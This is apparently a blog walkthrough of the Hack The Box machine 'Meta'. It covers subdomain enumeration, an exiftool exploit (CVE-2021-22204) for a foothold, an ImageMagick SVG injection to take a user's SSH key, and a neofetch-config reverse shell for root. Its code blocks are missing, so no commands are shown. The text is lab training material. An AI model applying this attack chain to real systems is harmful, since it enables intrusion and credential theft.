ūüĒéūü¶∂Enumeration/Foothold

Meta¬†from¬†HTB¬†and created by¬†Nauten¬†is a Medium machine with a focus on CVE-2021-22204. You start the box by finding a hidden ‘development’ sub-domain¬†dev01¬†that has an exploitable¬†exiftoolapplication. You use¬†CVE-2021-22204¬†for a shell on the box. Once on the box you exploit¬†mogrify¬†to elevate to the local user and a¬†neofetch¬†config for root.

Navigating to 10.10.11.140 on Port 80 shows a redirect to domain artcorp.htb so I add it into my host file:

Copy

On the¬†artcorp.htb¬†website I see a mention of¬†Development¬†and ‘testing phase’.

Website shows Development and 'testing phase'.

Website shows Development and 'testing phase'.

I kick off ffuf to scan for possible sub-domains and gobuster for a VHOST scan. ffuf comes back with a hit:

Copy

I add the sub-domain into my hosts file and navigate over. I see a MetaView application mentioning about uploading files to view the metadata:

Mentions displaying metadata and JPG/PNG requirement.

Mentions displaying metadata and JPG/PNG requirement.

‚ö† Attack Machine

Copy

I change lines 6-7 on the exploit to create the malicious image file and upload it to the host:

The shell coming back on the malicious exploit.

The shell coming back on the malicious exploit.

ūüĒĚEscalation to Thomas

Once on the host I use LinPEAS with extended extended flags showing convert_images.sh running as a cron:

‚ö† Attack Machine

Copy

ūüéĮVictim Machine

Copy

Reviewing the script it shows that Script shows mogrify is running and its taking a file from the covert_images directory:

Checking the mogrify version I can see that is indeed vulnerable:

Copy

Using Imagemagick РShell Injection as a reference I create a malicious .SVG and pull the users id_rsa:

‚ö† Attack Machine

Copy

ūüéĮVictim Machine

Copy

ūüĒĚEscalation to root

The key received had some formatting issues so I cleaned it up and logged into the box:

‚ö† Attack Machine

Copy

Once on the box I ran sudo -l to see that neofetch could be ran as root. Reviewing the neofetch documentation on neofetch РConfig I tried adding a bash reverse-shell to the config file and executing as root:

ūüéĮVictim Machine

Copy

‚ö† Attack Machine

Copy

The shell came back and we had root:

Copy

Rooted

Published On: June 8th, 2022 / Categories: HTB, Technology / Tags: , , , , , , /

Leave A Comment